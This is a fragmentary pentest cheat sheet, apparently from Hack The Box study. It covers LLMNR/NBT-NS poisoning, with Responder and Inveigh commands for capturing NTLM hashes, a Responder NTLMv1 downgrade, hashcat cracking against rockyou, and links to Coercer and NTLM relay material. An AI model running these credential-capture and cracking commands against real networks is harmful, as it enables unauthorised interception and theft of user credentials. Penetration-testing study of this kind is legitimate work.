LLMNR NBT-NS Poisoning

Responder

sudo responder -I ens224 

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

Hashes

Downgrade Attack

Responder.py -I eth0 -v --lm --disable-ess

https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ntlm/ntlmv1-downgradeppn.snovvcrash.rocks

NetNTLMv1 obtained - Convert the hash to NTLM - See Crack Hash

Inveigh

GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testersGitHub

PS C:\htb> Import-Module .\Inveigh.ps1

PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Invoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput Y

BasicsGitHub

C# version

PS C:\htb> .\Inveigh.exe

Press ESC to enter/exit interactive console

GET NTLMV2UNIQUE

GET NTLMV2USERNAMES

NTLM Relay

SMB (445, 139) / RPC

Relais NTLMPixis

Coercer

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.GitHub

More Tools: SMB